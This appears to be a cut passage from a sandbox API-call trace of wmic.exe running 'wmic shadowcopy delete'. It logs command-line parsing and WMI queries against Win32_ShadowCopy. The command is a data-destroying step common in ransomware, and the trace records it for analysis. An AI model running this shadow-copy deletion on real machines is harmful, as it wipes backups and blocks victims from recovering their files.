[0149.321] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.321] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.321] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=17, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.321] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="mof.xsl") returned 0x0 [0149.321] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.321] malloc (_Size=0x18) returned 0x239460 [0149.321] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.321] free (_Block=0x239460) [0149.321] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x9006b001d)) returned 0x0 [0149.321] malloc (_Size=0x18) returned 0x239460 [0149.321] malloc (_Size=0x18) returned 0x239480 [0149.321] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0149.321] SysStringLen (param_1="TABLE") returned 0x5 [0149.321] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0149.321] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0149.322] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0149.322] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0149.322] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0149.322] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0149.322] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0149.322] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0149.322] malloc (_Size=0x30) returned 0x238500 [0149.322] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.322] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.322] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.322] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=18, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.322] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="mof.xsl") returned 0x0 [0149.322] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.322] malloc (_Size=0x18) returned 0x2394a0 [0149.322] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.322] free (_Block=0x2394a0) [0149.322] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x9006b001d)) returned 0x0 [0149.322] malloc (_Size=0x18) returned 0x2394a0 [0149.322] malloc (_Size=0x18) returned 0x2394c0 [0149.322] SysStringLen (param_1="wmiclimofformat") returned 0xf [0149.322] SysStringLen (param_1="TABLE") returned 0x5 [0149.322] SysStringLen (param_1="wmiclimofformat") returned 0xf [0149.322] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0149.323] SysStringLen (param_1="wmiclimofformat") returned 0xf [0149.323] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0149.323] SysStringLen (param_1="wmiclimofformat") returned 0xf [0149.323] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0149.323] SysStringLen (param_1="wmiclimofformat") returned 0xf [0149.323] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0149.323] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0149.323] SysStringLen (param_1="wmiclimofformat") returned 0xf [0149.323] malloc (_Size=0x30) returned 0x238540 [0149.323] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.323] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.323] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.323] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=19, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.323] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="textvaluelist.xsl") returned 0x0 [0149.323] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.323] malloc (_Size=0x18) returned 0x2394e0 [0149.323] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.323] free (_Block=0x2394e0) [0149.323] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x9006b001d)) returned 0x0 [0149.323] malloc (_Size=0x18) returned 0x2394e0 [0149.323] malloc (_Size=0x18) returned 0x239500 [0149.323] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0149.324] SysStringLen (param_1="TABLE") returned 0x5 [0149.324] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0149.324] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0149.324] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0149.324] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0149.324] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0149.324] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0149.324] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0149.324] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0149.324] malloc (_Size=0x30) returned 0x238580 [0149.324] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.324] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.324] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.324] IXMLDOMNodeList:get_item (in: This=0x1f49cc0, index=20, listItem=0x17f3a0 | out: listItem=0x17f3a0*=0x1f4bd50) returned 0x0 [0149.324] IXMLDOMNode:get_text (in: This=0x1f4bd50, text=0x17f3b0 | out: text=0x17f3b0*="textvaluelist.xsl") returned 0x0 [0149.324] IXMLDOMNode:get_attributes (in: This=0x1f4bd50, attributeMap=0x17f3a8 | out: attributeMap=0x17f3a8*=0x1f478d0) returned 0x0 [0149.324] malloc (_Size=0x18) returned 0x239520 [0149.324] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f478d0, name="KEYWORD", namedItem=0x17f3b8 | out: namedItem=0x17f3b8*=0x1f4a280) returned 0x0 [0149.324] free (_Block=0x239520) [0149.324] IXMLDOMNode:get_nodeValue (in: This=0x1f4a280, value=0x17f3f0 | out: value=0x17f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x9006b001d)) returned 0x0 [0149.324] malloc (_Size=0x18) returned 0x239520 [0149.324] malloc (_Size=0x18) returned 0x239540 [0149.325] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0149.325] SysStringLen (param_1="TABLE") returned 0x5 [0149.325] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0149.325] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0149.325] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0149.325] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0149.325] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0149.325] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0149.325] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0149.325] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0149.325] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0149.325] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0149.325] malloc (_Size=0x30) returned 0x2385c0 [0149.325] IUnknown:Release (This=0x1f4bd50) returned 0x0 [0149.325] IUnknown:Release (This=0x1f478d0) returned 0x0 [0149.325] IUnknown:Release (This=0x1f4a280) returned 0x0 [0149.325] IUnknown:Release (This=0x1f49cc0) returned 0x0 [0149.325] FreeThreadedDOMDocument:IUnknown:Release (This=0x1f4bc50) returned 0x1 [0149.325] FreeThreadedDOMDocument:IUnknown:Release (This=0x1f471d0) returned 0x0 [0149.325] free (_Block=0x239040) [0149.325] GetCommandLineW () returned="wmic shadowcopy delete" [0149.326] malloc (_Size=0x30) returned 0x238600 [0149.326] memcpy_s (in: _Destination=0x238600, _DestinationSize=0x2e, _Source=0x262766, _SourceSize=0x2e | out: _Destination=0x238600) returned 0x0 [0149.326] malloc (_Size=0x18) returned 0x239040 [0149.326] malloc (_Size=0x18) returned 0x239560 [0149.326] malloc (_Size=0x18) returned 0x239580 [0149.326] malloc (_Size=0x18) returned 0x2395a0 [0149.326] malloc (_Size=0x80) returned 0x236cb0 [0149.326] GetLocalTime (in: lpSystemTime=0x17f560 | out: lpSystemTime=0x17f560*(wYear=0x7e7, wMonth=0x5, wDayOfWeek=0x4, wDay=0x12, wHour=0xd, wMinute=0x13, wSecond=0x34, wMilliseconds=0x392)) [0149.326] _vsnwprintf (in: _Buffer=0x236cb0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x17f4b8 | out: _Buffer="05-18-2023T13:19:52") returned 19 [0149.326] lstrlenW (lpString=" shadowcopy delete") returned 19 [0149.326] malloc (_Size=0x28) returned 0x23ca40 [0149.327] lstrlenW (lpString=" shadowcopy delete") returned 19 [0149.327] lstrlenW (lpString=" shadowcopy delete") returned 19 [0149.327] malloc (_Size=0x28) returned 0x23ca70 [0149.327] lstrlenW (lpString=" shadowcopy delete") returned 19 [0149.327] lstrlenW (lpString=" shadowcopy delete") returned 19 [0149.327] lstrlenW (lpString=" shadowcopy delete") returned 19 [0149.327] malloc (_Size=0x16) returned 0x2395c0 [0149.327] lstrlenW (lpString="shadowcopy") returned 10 [0149.327] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0149.327] malloc (_Size=0x16) returned 0x2395e0 [0149.327] malloc (_Size=0x8) returned 0x23caa0 [0149.327] free (_Block=0x0) [0149.327] free (_Block=0x2395c0) [0149.327] lstrlenW (lpString=" shadowcopy delete") returned 19 [0149.327] malloc (_Size=0xe) returned 0x2395c0 [0149.327] lstrlenW (lpString="delete") returned 6 [0149.327] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0149.327] malloc (_Size=0xe) returned 0x239600 [0149.327] malloc (_Size=0x10) returned 0x239620 [0149.327] memmove_s (in: _Destination=0x239620, _DestinationSize=0x8, _Source=0x23caa0, _SourceSize=0x8 | out: _Destination=0x239620) returned 0x0 [0149.327] free (_Block=0x23caa0) [0149.327] free (_Block=0x0) [0149.327] free (_Block=0x2395c0) [0149.327] malloc (_Size=0x10) returned 0x2395c0 [0149.328] lstrlenW (lpString="QUIT") returned 4 [0149.328] lstrlenW (lpString="shadowcopy") returned 10 [0149.328] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0149.328] lstrlenW (lpString="EXIT") returned 4 [0149.328] lstrlenW (lpString="shadowcopy") returned 10 [0149.328] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0149.328] free (_Block=0x2395c0) [0149.328] WbemLocator:IUnknown:AddRef (This=0x28cc10) returned 0x2 [0149.328] malloc (_Size=0x10) returned 0x2395c0 [0149.328] lstrlenW (lpString="/") returned 1 [0149.328] lstrlenW (lpString="shadowcopy") returned 10 [0149.328] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0149.328] lstrlenW (lpString="-") returned 1 [0149.328] lstrlenW (lpString="shadowcopy") returned 10 [0149.328] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0149.328] lstrlenW (lpString="CLASS") returned 5 [0149.328] lstrlenW (lpString="shadowcopy") returned 10 [0149.328] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0149.328] lstrlenW (lpString="PATH") returned 4 [0149.328] lstrlenW (lpString="shadowcopy") returned 10 [0149.328] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0149.328] lstrlenW (lpString="CONTEXT") returned 7 [0149.329] lstrlenW (lpString="shadowcopy") returned 10 [0149.329] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0149.329] lstrlenW (lpString="shadowcopy") returned 10 [0149.329] malloc (_Size=0x16) returned 0x239640 [0149.329] lstrlenW (lpString="shadowcopy") returned 10 [0149.329] GetCurrentThreadId () returned 0xca8 [0149.329] ??0CHString@@QEAA@XZ () returned 0x17f370 [0149.329] malloc (_Size=0x18) returned 0x239660 [0149.329] malloc (_Size=0x18) returned 0x239680 [0149.329] WbemLocator:IWbemLocator:ConnectServer (in: This=0x28cc10, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff772998 | out: ppNamespace=0xff772998*=0x2f6520) returned 0x0 [0149.601] free (_Block=0x239680) [0149.601] free (_Block=0x239660) [0149.601] CoSetProxyBlanket (pProxy=0x2f6520, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0149.602] ??1CHString@@QEAA@XZ () returned 0x7fef77bc96c [0149.602] GetCurrentThreadId () returned 0xca8 [0149.602] ??0CHString@@QEAA@XZ () returned 0x17f208 [0149.602] malloc (_Size=0x18) returned 0x239660 [0149.602] malloc (_Size=0x18) returned 0x239680 [0149.602] malloc (_Size=0x18) returned 0x2396a0 [0149.602] malloc (_Size=0x18) returned 0x2396c0 [0149.602] SysStringLen (param_1="root\\cli") returned 0x8 [0149.602] SysStringLen (param_1="\\") returned 0x1 [0149.602] memcpy (in: _Dst=0x304d78, _Src=0x304d18, _Size=0x12 | out: _Dst=0x304d78) returned 0x304d78 [0149.602] memcpy (in: _Dst=0x304d88, _Src=0x304cb8, _Size=0x4 | out: _Dst=0x304d88) returned 0x304d88 [0149.602] malloc (_Size=0x18) returned 0x2396e0 [0149.602] SysStringLen (param_1="root\\cli\\") returned 0x9 [0149.602] SysStringLen (param_1="ms_409") returned 0x6 [0149.602] memcpy (in: _Dst=0x276788, _Src=0x304d78, _Size=0x14 | out: _Dst=0x276788) returned 0x276788 [0149.602] memcpy (in: _Dst=0x27679a, _Src=0x304ce8, _Size=0xe | out: _Dst=0x27679a) returned 0x27679a [0149.602] free (_Block=0x2396c0) [0149.602] free (_Block=0x2396a0) [0149.603] free (_Block=0x239680) [0149.603] free (_Block=0x239660) [0149.603] malloc (_Size=0x18) returned 0x239660 [0149.603] WbemLocator:IWbemLocator:ConnectServer (in: This=0x28cc10, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff7729a0 | out: ppNamespace=0xff7729a0*=0x2f6640) returned 0x0 [0149.620] free (_Block=0x239660) [0149.620] free (_Block=0x2396e0) [0149.620] ??1CHString@@QEAA@XZ () returned 0x7fef77bc96c [0149.620] GetCurrentThreadId () returned 0xca8 [0149.620] ??0CHString@@QEAA@XZ () returned 0x17f380 [0149.620] malloc (_Size=0x18) returned 0x2396e0 [0149.620] malloc (_Size=0x18) returned 0x239660 [0149.620] malloc (_Size=0x18) returned 0x239680 [0149.620] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0149.620] malloc (_Size=0x3a) returned 0x23caa0 [0149.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff701980, cbMultiByte=-1, lpWideCharStr=0x23caa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0149.621] free (_Block=0x23caa0) [0149.621] malloc (_Size=0x18) returned 0x2396a0 [0149.621] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0149.621] SysStringLen (param_1="shadowcopy") returned 0xa [0149.621] memcpy (in: _Dst=0x2c6ea8, _Src=0x294278, _Size=0x3a | out: _Dst=0x2c6ea8) returned 0x2c6ea8 [0149.621] memcpy (in: _Dst=0x2c6ee0, _Src=0x304d18, _Size=0x16 | out: _Dst=0x2c6ee0) returned 0x2c6ee0 [0149.621] malloc (_Size=0x18) returned 0x2396c0 [0149.621] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0149.621] SysStringLen (param_1="'") returned 0x1 [0149.621] memcpy (in: _Dst=0x2c6e38, _Src=0x2c6ea8, _Size=0x4e | out: _Dst=0x2c6e38) returned 0x2c6e38 [0149.621] memcpy (in: _Dst=0x2c6e84, _Src=0x304d78, _Size=0x4 | out: _Dst=0x2c6e84) returned 0x2c6e84 [0149.621] free (_Block=0x2396a0) [0149.621] free (_Block=0x239680) [0149.621] free (_Block=0x239660) [0149.621] free (_Block=0x2396e0) [0149.621] IWbemServices:GetObject (in: This=0x2f6520, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x17f388*=0x0, ppCallResult=0x0 | out: ppObject=0x17f388*=0x2e8430, ppCallResult=0x0) returned 0x0 [0149.662] malloc (_Size=0x18) returned 0x2396e0 [0149.662] IWbemClassObject:Get (in: This=0x2e8430, wszName="Target", lFlags=0, pVal=0x17f2b0*(varType=0x0, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1=0xff772998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x17f2b0*(varType=0x8, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0149.663] free (_Block=0x2396e0) [0149.663] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0149.663] malloc (_Size=0x3e) returned 0x23caa0 [0149.663] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0149.663] malloc (_Size=0x18) returned 0x2396e0 [0149.663] IWbemClassObject:Get (in: This=0x2e8430, wszName="PWhere", lFlags=0, pVal=0x17f2b0*(varType=0x0, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1=0x294278, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x17f2b0*(varType=0x8, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0149.663] free (_Block=0x2396e0) [0149.663] lstrlenW (lpString=" Where ID = '#'") returned 15 [0149.664] malloc (_Size=0x20) returned 0x23caf0 [0149.664] lstrlenW (lpString=" Where ID = '#'") returned 15 [0149.664] malloc (_Size=0x18) returned 0x2396e0 [0149.664] IWbemClassObject:Get (in: This=0x2e8430, wszName="Connection", lFlags=0, pVal=0x17f2b0*(varType=0x0, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1=0x2dc3e8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x17f2b0*(varType=0xd, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e8910, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0149.664] free (_Block=0x2396e0) [0149.664] IUnknown:QueryInterface (in: This=0x2e8910, riid=0xff707360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x17f2a0 | out: ppvObject=0x17f2a0*=0x2e8910) returned 0x0 [0149.664] GetCurrentThreadId () returned 0xca8 [0149.664] ??0CHString@@QEAA@XZ () returned 0x17f1c8 [0149.664] malloc (_Size=0x18) returned 0x2396e0 [0149.665] IWbemClassObject:Get (in: This=0x2e8910, wszName="Namespace", lFlags=0, pVal=0x17f1f0*(varType=0x0, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1=0xff71738f, varVal2=0x2396e0), pType=0x0, plFlavor=0x0 | out: pVal=0x17f1f0*(varType=0x8, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x2396e0), pType=0x0, plFlavor=0x0) returned 0x0 [0149.665] free (_Block=0x2396e0) [0149.665] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0149.665] malloc (_Size=0x16) returned 0x2396e0 [0149.665] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0149.665] malloc (_Size=0x18) returned 0x239660 [0149.665] IWbemClassObject:Get (in: This=0x2e8910, wszName="Locale", lFlags=0, pVal=0x17f1f0*(varType=0x0, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1=0x304cb8, varVal2=0x2396e0), pType=0x0, plFlavor=0x0 | out: pVal=0x17f1f0*(varType=0x8, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x2396e0), pType=0x0, plFlavor=0x0) returned 0x0 [0149.665] free (_Block=0x239660) [0149.665] lstrlenW (lpString="ms_409") returned 6 [0149.666] malloc (_Size=0xe) returned 0x239660 [0149.666] lstrlenW (lpString="ms_409") returned 6 [0149.666] malloc (_Size=0x18) returned 0x239680 [0149.666] IWbemClassObject:Get (in: This=0x2e8910, wszName="User", lFlags=0, pVal=0x17f1f0*(varType=0x0, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1=0x304cb8, varVal2=0x2396e0), pType=0x0, plFlavor=0x0 | out: pVal=0x17f1f0*(varType=0x1, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1=0x304cb8, varVal2=0x2396e0), pType=0x0, plFlavor=0x0) returned 0x0 [0149.666] free (_Block=0x239680) [0149.666] malloc (_Size=0x18) returned 0x239680 [0149.666] IWbemClassObject:Get (in: This=0x2e8910, wszName="Password", lFlags=0, pVal=0x17f1f0*(varType=0x1, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1=0x304cb8, varVal2=0x2396e0), pType=0x0, plFlavor=0x0 | out: pVal=0x17f1f0*(varType=0x1, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1=0x304cb8, varVal2=0x2396e0), pType=0x0, plFlavor=0x0) returned 0x0 [0149.666] free (_Block=0x239680) [0149.666] malloc (_Size=0x18) returned 0x239680 [0149.666] IWbemClassObject:Get (in: This=0x2e8910, wszName="Server", lFlags=0, pVal=0x17f1f0*(varType=0x1, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1=0x304cb8, varVal2=0x2396e0), pType=0x0, plFlavor=0x0 | out: pVal=0x17f1f0*(varType=0x8, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x2396e0), pType=0x0, plFlavor=0x0) returned 0x0 [0149.667] free (_Block=0x239680) [0149.667] lstrlenW (lpString=".") returned 1 [0149.667] malloc (_Size=0x4) returned 0x23cb20 [0149.667] lstrlenW (lpString=".") returned 1 [0149.667] malloc (_Size=0x18) returned 0x239680 [0149.667] IWbemClassObject:Get (in: This=0x2e8910, wszName="Authority", lFlags=0, pVal=0x17f1f0*(varType=0x0, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1=0x304cb8, varVal2=0x2396e0), pType=0x0, plFlavor=0x0 | out: pVal=0x17f1f0*(varType=0x1, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1=0x304cb8, varVal2=0x2396e0), pType=0x0, plFlavor=0x0) returned 0x0 [0149.667] free (_Block=0x239680) [0149.667] ??1CHString@@QEAA@XZ () returned 0x7fef77bc96c [0149.667] IUnknown:Release (This=0x2e8910) returned 0x1 [0149.667] GetCurrentThreadId () returned 0xca8 [0149.667] ??0CHString@@QEAA@XZ () returned 0x17f1c8 [0149.667] malloc (_Size=0x18) returned 0x239680 [0149.667] IWbemClassObject:Get (in: This=0x2e8430, wszName="__RELPATH", lFlags=0, pVal=0x17f1f0*(varType=0x0, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1=0x304cb8, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x17f1f0*(varType=0x8, wReserved1=0xff77, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0149.668] free (_Block=0x239680) [0149.668] malloc (_Size=0x18) returned 0x239680 [0149.668] GetCurrentThreadId () returned 0xca8 [0149.668] ??0CHString@@QEAA@XZ () returned 0x17f048 [0149.668] ??0CHString@@QEAA@PEBG@Z () returned 0x17f060 [0149.668] ??0CHString@@QEAA@AEBV0@@Z () returned 0x17eff0 [0149.668] ?Empty@CHString@@QEAAXXZ () returned 0x7fef77bc96c [0149.668] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x23cb40 [0149.668] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0149.669] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x17efb0 [0149.669] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x17eff8 [0149.669] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x17f060 [0149.669] ??1CHString@@QEAA@XZ () returned 0x5ab63401 [0149.669] ??1CHString@@QEAA@XZ () returned 0x5ab63401 [0149.669] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x17efb8 [0149.669] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x17eff0 [0149.669] ??1CHString@@QEAA@XZ () returned 0x1 [0149.669] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x23cbb0 [0149.669] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0149.669] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x17efb0 [0149.669] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x17eff8 [0149.669] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x17f060 [0149.669] ??1CHString@@QEAA@XZ () returned 0x5ab63401 [0149.669] ??1CHString@@QEAA@XZ () returned 0x5ab63401 [0149.670] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x17efb8 [0149.670] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x17eff0 [0149.670] ??1CHString@@QEAA@XZ () returned 0x7fef77bc96c [0149.670] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef77bc960 [0149.670] ??1CHString@@QEAA@XZ () returned 0x7fef77bc96c [0149.670] malloc (_Size=0x18) returned 0x2396a0 [0149.670] malloc (_Size=0x18) returned 0x239700 [0149.670] malloc (_Size=0x18) returned 0x239720 [0149.670] malloc (_Size=0x18) returned 0x239740 [0149.670] malloc (_Size=0x18) returned 0x239760 [0149.670] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0149.670] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0149.670] memcpy (in: _Dst=0x30db48, _Src=0x3006e8, _Size=0x7a | out: _Dst=0x30db48) returned 0x30db48 [0149.670] memcpy (in: _Dst=0x30dbc0, _Src=0x276788, _Size=0x30 | out: _Dst=0x30dbc0) returned 0x30dbc0 [0149.670] malloc (_Size=0x18) returned 0x239780 [0149.670] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0149.670] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0149.671] memcpy (in: _Dst=0x2e86e8, _Src=0x30db48, _Size=0xa8 | out: _Dst=0x2e86e8) returned 0x2e86e8 [0149.671] memcpy (in: _Dst=0x2e878e, _Src=0x2f8fc8, _Size=0x54 | out: _Dst=0x2e878e) returned 0x2e878e [0149.671] malloc (_Size=0x18) returned 0x2397a0 [0149.671] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0149.671] SysStringLen (param_1="\"") returned 0x1 [0149.671] memcpy (in: _Dst=0x2e8808, _Src=0x2e86e8, _Size=0xfa | out: _Dst=0x2e8808) returned 0x2e8808 [0149.671] memcpy (in: _Dst=0x2e8900, _Src=0x304d18, _Size=0x4 | out: 